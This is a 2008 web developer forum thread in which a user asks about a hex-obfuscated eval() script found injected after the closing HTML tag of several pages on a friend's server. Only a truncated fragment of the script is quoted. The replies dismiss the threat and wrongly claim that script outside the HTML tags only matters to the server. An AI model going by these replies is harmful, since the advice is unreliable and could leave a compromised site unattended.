/    Sign up×
Community /Pin to ProfileBookmark

JS eval("..") code a possible threat?

I’ve found the following eval”(..”) code hard coded in several ‘splash’ pages on a friends server and we’re wondering what it’s doing there and also if it’s the cause of some strange goings on!!!

It’s been hard coded after the closing </HTML> tag – if it makes any difference! 🙂

Any comments would be appreciated.

[code]
<!– [ d33f4d9862bf229423b0b2fdcc850d40 ] –><script>eval(‘x66x75x6e
… continues forever! …
x27x29x3b’);</script><!– end –>
[/code]

Thanks.

to post a comment
JavaScript

2 Comments(s)

Copy linkTweet thisAlerts:
@Declan1991Jun 04.2008 — Not in that case as far as I know.
Copy linkTweet thisAlerts:
@mrhooJun 04.2008 — The first 3 letters are 'fun'- probably a function definition.

alert the whole string (without the eval) to read it.

If it is outside the html tags it can only mean something to the server,

maybe used to cache a script with the page....
×

Success!

Help @meetn2veg spread the word by sharing this article on Twitter...

Tweet This
Sign in
Forgot password?
Sign in with TwitchSign in with GithubCreate Account
about: ({
version: 0.1.9 BETA 5.5,
whats_new: community page,
up_next: more Davinci•003 tasks,
coming_soon: events calendar,
social: @webDeveloperHQ
});

legal: ({
terms: of use,
privacy: policy
});
changelog: (
version: 0.1.9,
notes: added community page

version: 0.1.8,
notes: added Davinci•003

version: 0.1.7,
notes: upvote answers to bounties

version: 0.1.6,
notes: article editor refresh
)...
recent_tips: (
tipper: @Yussuf4331,
tipped: article
amount: 1000 SATS,

tipper: @darkwebsites540,
tipped: article
amount: 10 SATS,

tipper: @Samric24,
tipped: article
amount: 1000 SATS,
)...